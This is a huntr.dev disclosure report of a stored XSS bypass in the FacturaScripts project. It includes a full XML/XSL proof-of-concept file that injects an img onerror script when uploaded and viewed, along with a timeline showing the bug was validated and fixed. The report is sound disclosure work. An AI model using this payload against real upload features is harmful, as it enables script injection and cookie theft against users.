xss bypass of https://huntr.dev/bounties/4bc8f164-faf8-4096-aa00-e439fa976876/ in neorazorx/facturascripts

Valid

Reported on

May 14th 2022


Description

xss bypass of https://huntr.dev/bounties/4bc8f164-faf8-4096-aa00-e439fa976876/

TESTED BROWSER

google chrome

Proof of Concept

this bug has been fixed by setting text/xml content-type .
But this can also be bypassed . Save bellow file as test.xml .

<?xml version="1.0"?>
<?xml-stylesheet type="text/xml" href="#stylesheet"?>
<!DOCTYPE doc [
<!ATTLIST xsl:stylesheet
id ID #REQUIRED>]>
<!-- It works on Chrome/Safari/Edge and IE -->
<xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="html" doctype-public="&gt;&lt;img src=x onerror=alert(document.domain)&gt;"  />
<xsl:template match="/">
<root/>
</xsl:template>
</xsl:stylesheet>

Upload this and view the file and see xss is executed

Impact

xss allow to steal victim cookie

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. a month ago
We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back a month ago
Carlos Garcia validated this vulnerability a month ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carlos Garcia confirmed that a fix has been merged on f1ca50 a month ago
The fix bounty has been dropped
AppRouter.php#L90-L295 has been validated
to join this conversation